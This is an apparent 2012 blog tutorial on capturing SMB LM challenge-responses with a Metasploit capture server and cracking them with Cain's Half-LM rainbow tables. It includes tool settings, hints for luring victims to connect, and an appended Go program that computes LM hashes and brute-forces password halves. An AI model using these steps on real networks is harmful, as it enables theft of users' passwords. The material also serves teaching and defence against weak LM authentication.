Refresher Series - Capturing and cracking SMB hashes with Cain and Half-LM rainbow tables.

Thursday, December 20, 2012

f8lerror


First things first, what is an LM hash, or LAN Manager hash? The LM hash is an outdated password hashing function that is nevertheless still widely in use in corporate environments today. Its most important features are as follows:

  • Passwords are a maximum of 14 characters (14 bytes); Windows cannot produce an LM hash for anything longer.
  • Passwords are converted to uppercase before hashing, so the hash carries no case information.
  • Passwords are padded with null bytes to 14 bytes.
  • The 14-byte password is split into two 7-byte halves, and each half is used independently as a DES key to encrypt the constant string KGS!@#$%. (This is the weakness exploited by the Half-LM attack: each half can be cracked on its own.)
  • Read more about LM hashes at http://en.wikipedia.org/wiki/LM_hash

Simply put, if a user chooses the password 'Password', the LM hashing function turns it into "PASSWOR" and "D"; if they choose "PaSSwOrD12345!" it becomes "PASSWOR" and "D12345!". Obviously cracking two short passwords takes less time than cracking one long one. The same split survives network authentication: the first 8 bytes of the 24-byte LM challenge-response depend only on the first 7 bytes of the LM hash, and therefore only on the first 7 characters of the password, which is why a rainbow table built for one known challenge can look up that first half directly.


Before you can use the Half-LM rainbow tables you either need to download them or generate them yourself, as I did, using Winrtgen, which is included with Cain. When using Winrtgen it is important to note the disk space and the success probability; both are directly influenced by the charset and the number of tables. In the image below you can see that the tables will only recover 97% of passwords using the alpha-numeric-symbol14 charset. You will also want to run the benchmark to see how long it will take you to generate the tables. As a side note, you can divide the tables.lst file to distribute the load, even among cores, as Winrtgen is not written with multicore support. Then we wait...

image

On to the fun stuff. To capture a hash we use the Metasploit SMB capture auxiliary module, auxiliary/server/capture/smb. Leave the default settings, with the exception of CAINPWFILE: set this to whatever output path you like. In particular, leave CHALLENGE at its default of 1122334455667788. The Half-LM rainbow tables are generated against that fixed challenge, and a captured response will only match the tables if the server sent exactly that challenge.


image

Now you wait. You can do various things to coerce victims into connecting to you, such as NetBIOS name spoofing or embedding UNC paths, but that's a topic for another day. When a user attempts to connect to the capture server you will see output similar to this. The important thing to note is that the capture contains an LM response (the LM hash encrypted against the challenge) and not only an NTLM response. If the client is configured not to send LM responses (LmCompatibilityLevel of 2 or higher), the Half-LM attack does not apply.

image

When you're ready, load the hashes into Cain by selecting the Cracker tab, then the plus symbol, to add your hashes from a list (the file you pointed CAINPWFILE at).

image

Then select the hashes you want to crack, right-click, and choose Cryptanalysis attack, Half-LM hashes + challenge, via Rainbow tables.

image

Load your tables and let it run. The running time depends on the number of hashes and the size of your tables.

image

When it is done you will have a result similar to the image below. As you can see we have not recovered the actual passwords yet, only their first seven characters, but we're close. Let's finish them off.

image

Follow a similar procedure to the above by right-clicking the hashes, but this time select Brute-Force attack and LM Hashes + Challenge. As you can see I set the Max length to 3, because I assume nobody picked a password over 10 characters, which is probably a pretty good assumption in this case. ;)

image

Remember we already cracked 7 of the characters, so the brute force only has to cover the remaining ones. As you can see, the 2nd half of the passwords is cracked extremely fast.

image

Cain then does a quick case brute force against the cracked password to determine its proper case; the LM hash has discarded the case, so the candidate case permutations are checked against the NTLM response captured alongside it. As you can see, the passwords were recovered.

 
image
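As an added worked example (not part of the original post, and not Cain's or Metasploit's code), the Go program below implements what the steps above rely on: the LM hash construction from the first section, the 24-byte LM challenge-response that the capture module records, and the finishing brute force over characters 8 to 14 once the rainbow tables have returned the first 7. It assumes the challenge 1122334455667788 (Metasploit's default, the fixed challenge Cain's Half-LM tables are built for); the "captured" response in main() is constructed locally from the password "Password" rather than taken from a real client, and the names lmHash, lmResponse and crackSecondHalf are this example's own.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Challenge Cain's Half-LM tables are built against; also the default CHALLENGE
// of Metasploit's auxiliary/server/capture/smb module (assumed here).
const fixedChallengeHex = "1122334455667788"
const lmMagic = "KGS!@#$%" // constant block each 7-byte password half DES-encrypts

// desKey7to8 spreads 56 key bits over 8 bytes with the low (parity) bit of each
// byte cleared. DES ignores parity, so this is the standard LM key expansion.
func desKey7to8(k []byte) []byte {
	return []byte{
		k[0] & 0xFE,
		(k[0]<<7 | k[1]>>1) & 0xFE,
		(k[1]<<6 | k[2]>>2) & 0xFE,
		(k[2]<<5 | k[3]>>3) & 0xFE,
		(k[3]<<4 | k[4]>>4) & 0xFE,
		(k[4]<<3 | k[5]>>5) & 0xFE,
		(k[5]<<2 | k[6]>>6) & 0xFE,
		(k[6] << 1) & 0xFE,
	}
}

// desEncrypt encrypts one 8-byte block under a 7-byte key.
func desEncrypt(key7, block []byte) []byte {
	c, err := des.NewCipher(desKey7to8(key7))
	if err != nil {
		panic(err) // cannot happen: the expanded key is always 8 bytes
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmHash builds the 16-byte LAN Manager hash: uppercase, null-pad to 14 bytes,
// split into two 7-byte halves, DES-encrypt KGS!@#$% under each half.
func lmHash(password string) ([]byte, error) {
	if len(password) > 14 { // Windows stores no LM hash for longer passwords
		return nil, fmt.Errorf("password of %d bytes has no LM hash", len(password))
	}
	buf := make([]byte, 14)
	copy(buf, strings.ToUpper(password))
	h := desEncrypt(buf[:7], []byte(lmMagic))
	return append(h, desEncrypt(buf[7:], []byte(lmMagic))...), nil
}

// lmResponse builds the 24-byte LM challenge-response a client sends: pad the
// hash with five zero bytes to 21, split into three 7-byte keys, DES-encrypt the
// challenge under each. Bytes 0-7 depend only on the first 7 password characters.
func lmResponse(hash, challenge []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, hash)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(padded[i*7:(i+1)*7], challenge)...)
	}
	return resp
}

// crackSecondHalf is the finishing step: with the first 7 (uppercase) characters
// already recovered from the tables, brute-force characters 8..14 over charset up
// to maxLen and test each candidate against the full captured response.
func crackSecondHalf(resp, challenge []byte, first7, charset string, maxLen int) (string, bool) {
	var try func(suffix string) (string, bool)
	try = func(suffix string) (string, bool) {
		h, err := lmHash(first7 + suffix)
		if err == nil && bytes.Equal(lmResponse(h, challenge), resp) {
			return first7 + suffix, true
		}
		if len(suffix) == maxLen {
			return "", false
		}
		for _, c := range charset {
			if pw, ok := try(suffix + string(c)); ok {
				return pw, true
			}
		}
		return "", false
	}
	return try("")
}

func main() {
	challenge, _ := hex.DecodeString(fixedChallengeHex)
	for _, pw := range []string{"Password", "PaSSwOrD12345!"} {
		h, _ := lmHash(pw)
		fmt.Printf("%-15s LM=%x response[0:8]=%x\n", pw, h, lmResponse(h, challenge)[:8])
	}
	h, _ := lmHash("Password") // constructed capture, not taken from a real client
	pw, ok := crackSecondHalf(lmResponse(h, challenge), challenge, "PASSWOR", "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", 3)
	fmt.Println("recovered:", pw, ok)
}
```

Run it with go run: both passwords print the same first eight response bytes, which is exactly why a single table indexed by those bytes recovers "PASSWOR" for both. The case recovery Cain performs afterwards is not shown; it needs the NTLM response (MD4-based), which Go's standard library does not provide.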

That's it! It is actually simpler in practice than it appears here. Good luck and have fun. Cross-posted from infosecsee.com

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.
